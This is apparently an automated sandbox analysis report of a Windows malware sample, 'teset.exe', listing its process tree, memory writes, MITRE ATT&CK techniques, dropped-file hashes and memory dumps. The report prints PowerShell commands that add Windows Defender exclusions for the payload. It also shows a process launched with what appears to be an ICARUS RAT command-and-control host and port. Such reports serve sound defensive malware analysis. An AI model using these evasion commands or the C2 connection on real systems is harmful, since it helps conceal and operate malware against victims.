Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe
3304	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4272	SearchUI.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 3612 wrote to memory of 2308	3612	teset.exe	74
PID 3612 wrote to memory of 2308	3612	teset.exe	74
PID 3612 wrote to memory of 2308	3612	teset.exe	74
PID 2308 wrote to memory of 2392	2308	csc.exe	75
PID 2308 wrote to memory of 2392	2308	csc.exe	75
PID 2308 wrote to memory of 2392	2308	csc.exe	75
PID 3612 wrote to memory of 3304	3612	teset.exe	76
PID 3612 wrote to memory of 3304	3612	teset.exe	76
PID 3612 wrote to memory of 2304	3612	teset.exe	77
PID 3612 wrote to memory of 2304	3612	teset.exe	77
PID 3612 wrote to memory of 2304	3612	teset.exe	77
PID 3612 wrote to memory of 2304	3612	teset.exe	77
PID 3612 wrote to memory of 2304	3612	teset.exe	77
PID 3612 wrote to memory of 2304	3612	teset.exe	77
PID 3612 wrote to memory of 2304	3612	teset.exe	77
PID 3612 wrote to memory of 2304	3612	teset.exe	77
PID 3304 wrote to memory of 4168	3304	explorer.exe	78
PID 3304 wrote to memory of 4168	3304	explorer.exe	78
PID 3612 wrote to memory of 4728	3612	teset.exe	79
PID 3612 wrote to memory of 4728	3612	teset.exe	79
PID 3612 wrote to memory of 4728	3612	teset.exe	79
PID 2304 wrote to memory of 4108	2304	cvtres.exe	81
PID 2304 wrote to memory of 4108	2304	cvtres.exe	81
PID 2304 wrote to memory of 4108	2304	cvtres.exe	81
PID 2304 wrote to memory of 5040	2304	cvtres.exe	83
PID 2304 wrote to memory of 5040	2304	cvtres.exe	83
PID 2304 wrote to memory of 5040	2304	cvtres.exe	83
PID 4728 wrote to memory of 3140	4728	cmd.exe	85
PID 4728 wrote to memory of 3140	4728	cmd.exe	85
PID 4108 wrote to memory of 1072	4108	cmd.exe	86
PID 4108 wrote to memory of 1072	4108	cmd.exe	86
PID 4108 wrote to memory of 1072	4108	cmd.exe	86
PID 5040 wrote to memory of 3224	5040	cmd.exe	87
PID 5040 wrote to memory of 3224	5040	cmd.exe	87
PID 5040 wrote to memory of 3224	5040	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\teset.exe
"C:\Users\Admin\AppData\Local\Temp\teset.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3612
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b2lrmimp\b2lrmimp.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2308
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5EA5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6FC40E1AF764FC0B2075C88785F87D.TMP"
    3⤵
    PID:2392
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies Installed Components in the registry
  - Enumerates connected drives
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3304
- - C:\Windows\system32\ctfmon.exe
    ctfmon.exe
    3⤵
    PID:4168
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2304
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4108
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5040
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3224
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4728
- - C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
    C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3140

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
02754fcd69f8dba394e64276fe830bcd

SHA1
5feade46f4b0b89c4a674d9c8d0c77706ed56400

SHA256
4f2d5ae33747b425ea54df3063b3182e2bfaa5bc099631880e5408d5d4eb38aa

SHA512
1883a23083ccb707db2c872a6182672a9f05e11fb5f130fa9afed411f4b9dddc74114d40a03811c761d90078ca65edf9b9db77e3b62c335ad9b08e4b5153ae44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
2df94ca02ee43efcd5bed97f20401f04

SHA1
2470643898d5c8aa933d119643c07f089f31d601

SHA256
b8e02bc1c6e22fb554d4722ad732ac44d86e11b1f3c02555b6e0d1d3097e804a

SHA512
a7b38c1d2c09ebac8bbd9d2e9f178c2c8d89a8b753761d9c9fa06ff82ed38bc8a4f4a30af14c95ffa3f89eee223f5869d75cca6e419e59278833671a28d4b4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

Filesize
4KB

MD5
0b1f4831612c84c75db7cbcfc9834248

SHA1
4783074bc75cab8282847ab9f153289b020ad16b

SHA256
f61674b227ac1dc47519413329db6bc8e17aa0984c0e014271064e8bc5cf37d3

SHA512
de9de6f8805bf598a9c7f6900e1983cd8308ecd2f512e3090886227a69d77ce75aadc6249af1a21eb35c1fdab64a7c3c8cbe2ae42ffc44fa7d90cc3b14bb63eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5EA5.tmp

Filesize
1KB

MD5
73cbc96fd796f52ae33d08490fe0622c

SHA1
b5217c3344ca0b53c625a8625779f407d390d5ca

SHA256
537f47e8424d99402a774f4fd05f300a24713955e2f0f405b441247bc5ac3cf1

SHA512
53e5a81ebbb5ff58960aeda898171ad1aeb77a867a226f829102353fc73ad7b82154a91732a4dbd37d9aa241ba1bfb277227f2dbb432be029d45015fdbc9738b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1kzq004d.2vu.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6FC40E1AF764FC0B2075C88785F87D.TMP

Filesize
1KB

MD5
8bbf0aca651a891e81c9323a8af372ee

SHA1
c6ff718e14da6eb73d2733b41c0a95df9a23fc45

SHA256
9e6805b532ceb4ee0108f8616675400798da72a930d70a28c8f12529eacea0c2

SHA512
e9c6bfb01f3d68dbd96e31b7f18d78ea574b7e6c622809a2be0459c4f6b9a4abc204ddc4b6f7526dfdfc872ff543beaa3ceeb89c8f7c7b968c6320740bdfdebb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\b2lrmimp\b2lrmimp.0.cs

Filesize
1KB

MD5
14846c9faaef9299a1bf17730f20e4e6

SHA1
8083da995cfaa0e8e469780e32fcff1747850eb6

SHA256
61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

SHA512
549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\b2lrmimp\b2lrmimp.cmdline

Filesize
450B

MD5
01ddf00f90aecead58018c678db236c7

SHA1
2af7f47bf2c7d31d976620ded77d0c39979e57d2

SHA256
8b451abc6dc6652bb95648387914352bf3d6f57c177d54ea219c223ee0e7b5e1

SHA512
a49d79de7a50be7833772d725e9ee3354abaf8112cf0fcabc51bd9b72ef066c03bfeb6692d16ed51cbd3753ef295827a08cca73a42c4d7a1876ce982fc1a6902

Download Submit
memory/1072-101-0x0000000006C50000-0x0000000006C60000-memory.dmp

Filesize
64KB

Download
memory/1072-100-0x00000000095C0000-0x0000000009665000-memory.dmp

Filesize
660KB

Download
memory/1072-52-0x00000000083B0000-0x0000000008426000-memory.dmp

Filesize
472KB

Download
memory/1072-85-0x000000007EBA0000-0x000000007EBB0000-memory.dmp

Filesize
64KB

Download
memory/1072-553-0x0000000009410000-0x0000000009418000-memory.dmp

Filesize
32KB

Download
memory/1072-603-0x0000000073700000-0x0000000073DEE000-memory.dmp

Filesize
6.9MB

Download
memory/1072-262-0x0000000073700000-0x0000000073DEE000-memory.dmp

Filesize
6.9MB

Download
memory/1072-36-0x0000000073700000-0x0000000073DEE000-memory.dmp

Filesize
6.9MB

Download
memory/1072-50-0x00000000079E0000-0x00000000079FC000-memory.dmp

Filesize
112KB

Download
memory/1072-540-0x0000000009430000-0x000000000944A000-memory.dmp

Filesize
104KB

Download
memory/1072-47-0x0000000007CF0000-0x0000000008040000-memory.dmp

Filesize
3.3MB

Download
memory/1072-41-0x00000000078F0000-0x0000000007912000-memory.dmp

Filesize
136KB

Download
memory/1072-39-0x0000000006C50000-0x0000000006C60000-memory.dmp

Filesize
64KB

Download
memory/1072-91-0x00000000084F0000-0x000000000850E000-memory.dmp

Filesize
120KB

Download
memory/1072-46-0x0000000007C80000-0x0000000007CE6000-memory.dmp

Filesize
408KB

Download
memory/1072-89-0x0000000073ED0000-0x0000000073F1B000-memory.dmp

Filesize
300KB

Download
memory/2304-18-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2304-87-0x0000000073700000-0x0000000073DEE000-memory.dmp

Filesize
6.9MB

Download
memory/2304-104-0x0000000009A70000-0x0000000009A80000-memory.dmp

Filesize
64KB

Download
memory/2304-22-0x0000000009A70000-0x0000000009A80000-memory.dmp

Filesize
64KB

Download
memory/2304-21-0x0000000073700000-0x0000000073DEE000-memory.dmp

Filesize
6.9MB

Download
memory/3140-30-0x0000000000D50000-0x0000000000D58000-memory.dmp

Filesize
32KB

Download
memory/3140-45-0x00000000016A0000-0x00000000016B0000-memory.dmp

Filesize
64KB

Download
memory/3140-261-0x00007FFE3D270000-0x00007FFE3DC5C000-memory.dmp

Filesize
9.9MB

Download
memory/3140-613-0x00000000016A0000-0x00000000016B0000-memory.dmp

Filesize
64KB

Download
memory/3140-31-0x00007FFE3D270000-0x00007FFE3DC5C000-memory.dmp

Filesize
9.9MB

Download
memory/3224-38-0x0000000073700000-0x0000000073DEE000-memory.dmp

Filesize
6.9MB

Download
memory/3224-90-0x0000000073ED0000-0x0000000073F1B000-memory.dmp

Filesize
300KB

Download
memory/3224-44-0x0000000007910000-0x0000000007976000-memory.dmp

Filesize
408KB

Download
memory/3224-40-0x0000000007030000-0x0000000007658000-memory.dmp

Filesize
6.2MB

Download
memory/3224-88-0x0000000008E90000-0x0000000008EC3000-memory.dmp

Filesize
204KB

Download
memory/3224-102-0x0000000004590000-0x00000000045A0000-memory.dmp

Filesize
64KB

Download
memory/3224-103-0x00000000094D0000-0x0000000009564000-memory.dmp

Filesize
592KB

Download
memory/3224-37-0x0000000004600000-0x0000000004636000-memory.dmp

Filesize
216KB

Download
memory/3224-51-0x0000000007DD0000-0x0000000007E1B000-memory.dmp

Filesize
300KB

Download
memory/3224-612-0x0000000073700000-0x0000000073DEE000-memory.dmp

Filesize
6.9MB

Download
memory/3224-264-0x0000000073700000-0x0000000073DEE000-memory.dmp

Filesize
6.9MB

Download
memory/3224-86-0x000000007F1D0000-0x000000007F1E0000-memory.dmp

Filesize
64KB

Download
memory/3304-154-0x0000000002DC0000-0x0000000002DC1000-memory.dmp

Filesize
4KB

Download
memory/3612-0-0x0000000000ED0000-0x0000000000F52000-memory.dmp

Filesize
520KB

Download
memory/3612-5-0x00000000072C0000-0x00000000077BE000-memory.dmp

Filesize
5.0MB

Download
memory/3612-4-0x00000000059B0000-0x00000000059C0000-memory.dmp

Filesize
64KB

Download
memory/3612-3-0x00000000057F0000-0x0000000005882000-memory.dmp

Filesize
584KB

Download
memory/3612-2-0x0000000005750000-0x00000000057EC000-memory.dmp

Filesize
624KB

Download
memory/3612-1-0x0000000073700000-0x0000000073DEE000-memory.dmp

Filesize
6.9MB

Download
memory/3612-49-0x0000000073700000-0x0000000073DEE000-memory.dmp

Filesize
6.9MB

Download
memory/4272-226-0x00000283461A0000-0x00000283461C0000-memory.dmp

Filesize
128KB

Download
memory/4272-220-0x0000028346000000-0x0000028346020000-memory.dmp

Filesize
128KB

Download